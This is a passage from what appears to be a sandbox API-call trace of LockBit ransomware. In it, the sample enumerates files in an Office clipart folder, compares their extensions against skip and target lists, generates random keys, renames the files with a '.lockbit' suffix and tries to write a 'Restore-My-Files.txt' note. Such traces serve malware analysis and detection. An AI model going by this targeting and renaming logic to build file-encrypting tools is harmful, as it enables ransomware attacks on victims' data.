pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.953] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned=".WMF" [0146.954] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.954] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.954] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.955] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.955] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.955] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.955] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.955] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.955] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF.lockbit") returned 72 [0146.955] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157191.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.956] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.956] malloc (_Size=0x40068) returned 0x3df0008 [0146.956] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=17912) returned 1 [0146.956] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.957] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.957] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.957] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.957] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.962] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.962] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.963] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.964] free (_Block=0x1fa2ed8) [0146.964] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.964] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.964] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.964] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56478790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2c84, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0157831.WMF", cAlternateFileName="")) returned 1 [0146.964] lstrcmpiW (lpString1=".", lpString2="J0157831.WMF") returned -1 [0146.964] lstrcmpiW (lpString1="..", lpString2="J0157831.WMF") returned -1 [0146.964] PathFindExtensionW (pszPath="J0157831.WMF") returned=".WMF" [0146.964] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.964] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.964] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.964] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.964] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.964] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.964] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.965] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.966] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.966] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.967] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0157831.WMF") returned 1 [0146.967] lstrcmpiW (lpString1="ntldr", lpString2="J0157831.WMF") returned 1 [0146.967] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0157831.WMF") returned 1 [0146.967] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0157831.WMF") returned -1 [0146.967] lstrcmpiW (lpString1="autorun.inf", lpString2="J0157831.WMF") returned -1 [0146.967] lstrcmpiW (lpString1="thumbs.db", lpString2="J0157831.WMF") returned 1 [0146.967] lstrcmpiW (lpString1="iconcache.db", lpString2="J0157831.WMF") returned -1 [0146.967] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.967] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned=".WMF" [0146.967] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.967] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.967] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.967] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.967] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.967] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.967] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.967] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.967] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.967] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.967] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.968] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.968] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF.lockbit") returned 72 [0146.968] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157831.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0146.969] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.969] malloc (_Size=0x40068) returned 0x3e70008 [0146.969] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=11396) returned 1 [0146.970] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0146.970] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.971] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0146.971] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0146.977] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.977] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.977] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.978] free (_Block=0x1fa2ed8) [0146.978] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.978] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.978] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.978] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56478790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x48dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0158071.WMF", cAlternateFileName="")) returned 1 [0146.978] lstrcmpiW (lpString1=".", lpString2="J0158071.WMF") returned -1 [0146.978] lstrcmpiW (lpString1="..", lpString2="J0158071.WMF") returned -1 [0146.978] PathFindExtensionW (pszPath="J0158071.WMF") returned=".WMF" [0146.978] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.978] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.978] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.978] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.978] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.979] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.980] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.980] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.981] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0158071.WMF") returned 1 [0146.981] lstrcmpiW (lpString1="ntldr", lpString2="J0158071.WMF") returned 1 [0146.981] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0158071.WMF") returned 1 [0146.981] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0158071.WMF") returned -1 [0146.981] lstrcmpiW (lpString1="autorun.inf", lpString2="J0158071.WMF") returned -1 [0146.981] lstrcmpiW (lpString1="thumbs.db", lpString2="J0158071.WMF") returned 1 [0146.981] lstrcmpiW (lpString1="iconcache.db", lpString2="J0158071.WMF") returned -1 [0146.981] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.981] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned=".WMF" [0146.981] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.981] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.981] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.981] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.981] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.981] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.981] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.981] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.981] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.981] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.981] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.981] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.981] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.982] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.982] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF.lockbit") returned 72 [0146.982] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0146.983] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.983] malloc (_Size=0x40068) returned 0x3ef0008 [0146.983] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=18652) returned 1 [0146.983] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.984] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0146.984] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.985] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0146.985] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0146.990] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.990] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.990] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.991] free (_Block=0x1fa2ed8) [0146.991] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.991] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.991] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.992] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x462e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0158477.WMF", cAlternateFileName="")) returned 1 [0146.992] lstrcmpiW (lpString1=".", lpString2="J0158477.WMF") returned -1 [0146.992] lstrcmpiW (lpString1="..", lpString2="J0158477.WMF") returned -1 [0146.992] PathFindExtensionW (pszPath="J0158477.WMF") returned=".WMF" [0146.992] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.992] lstrcmpiW (lpString1=".cmd", 